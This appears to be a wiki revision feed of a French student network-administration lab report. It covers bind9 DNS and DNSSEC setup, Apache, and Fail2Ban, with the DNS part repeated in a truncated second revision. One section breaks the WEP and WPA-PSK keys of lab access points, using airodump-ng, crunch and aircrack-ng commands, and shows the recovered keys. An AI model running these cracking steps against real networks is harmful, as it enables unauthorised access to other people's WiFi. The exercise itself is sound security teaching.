|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;; //repertoire des keys&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;; //utilisation d'une politique DNSSEC&lt;br /&gt;
inline-signing yes; //activation de la signature automatique&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur la machine de service Tompere2 ====&lt;br /&gt;
&lt;br /&gt;
=== Résultat ===&lt;br /&gt;
[[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12332</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12332"/>
		<updated>2026-02-22T11:36:01Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Serveur Apache */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;; //repertoire des keys&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;; //utilisation d'une politique DNSSEC&lt;br /&gt;
inline-signing yes; //activation de la signature automatique&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
